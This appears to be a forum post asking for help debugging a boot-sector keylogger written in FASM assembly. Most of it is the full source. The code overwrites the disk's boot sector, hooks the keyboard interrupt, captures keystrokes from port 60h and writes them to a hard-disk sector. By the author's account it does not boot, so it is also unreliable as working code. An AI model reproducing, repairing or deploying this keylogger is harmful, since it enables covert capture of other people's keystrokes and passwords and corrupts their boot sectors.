I make a 1337 keylogger in FASM to be installed onto boot sector of OS however instead log keystrokes and write to a hard disk sector my keylogger dont boot with OS the problem is that is showed a message of boot sector dont found. Please read carefully my source:
org 0x100
mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0H
int 13h
mov ah,8
mov dx,0H
mov di,0
push es
mov es,di
INT 13H
pop es
mov ax,301h
sub cl,6
mov dl,0H
MOV WORD[SETOR+510],0AA55H
mov bx,SETOR
INT 13H
LEA DI,[SETOR+1Eh]
MOV SI,BOOT
MOV CX,1BDh
REP MOVSB
lea bx,[SETOR+1Eh]
MOV WORD[SETOR+510],0AA55H
mov ax,301h
mov dx,0H
mov cx,1
INT 13H
ret
SETOR DB 512 DUP (0)
BOOT:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]
es
mov [180h],cx
es
mov [182h],dx
mov cx,0
int 12h
sub ax,3
mov cl,6
shl ax,cl
mov cx,0
mov bp,ax
es
mov [24h],cx
es
mov [26h],bp
pop es
sti
push es
mov si,bp
mov es,si
mov si,7C00h + code ;começo do programa
mov di,0
mov cx,446 ; TAMANHO DO MEU PAYLOAD
repz
movsb
pop es
push es
mov ax,bp
mov es,ax
mov ax,0
mov bx,7C00h + 480
mov es,bp
es
mov [bx],ax
pop es
MOV AH,8
MOV DL,0
MOV DI,0
PUSH ES
MOV ES,DI
INT 13h
POP ES
MOV AX,201h
MOV BX,0
MOV ES,BX
MOV BX,500h
MOV DL,0
SUB CL,6
INT 13h
JMP 0:500h
code:
pushf
pushaw
sti
IN AL,60H
push ax
int 60h
pop ax
push cs
pop bx
push ds
mov ds,bx
push es
test al,80h
jnz L1
ds
mov bx,[7C00h+480]
ds
lea si,[7C00h+482]
ds
mov [si+bx],al
inc bx
ds
mov [7C00h+480],bx
L1:
cmp bx,512
jz zera
jmp pula
zera:
mov ax,0
mov [7C00h+480],ax
pula:
push es
mov cx,ds ;Traduz os 512 bytes de scan codes para ascii
mov es,cx
mov cx,1
push bx
dec bx
ds
lea si,[7C00h+482+bx]
pop bx
int 12h
sub ax,4
mov cl,6
shl ax,cl
mov bp,ax
MOV AH,8
MOV DL,0
PUSH ES
MOV DI,0
MOV ES,DI
INT 13h
POP ES
MOV AX,301h
push bx
lea bx,[bx]
SUB CL,7
MOV DL,0
INT 13h
pop bx
POP ES
skip:
mov al,20h
out 20h,al
pop es
pop ds
popaw
popf
iret
codesize:
db 55h
db AAh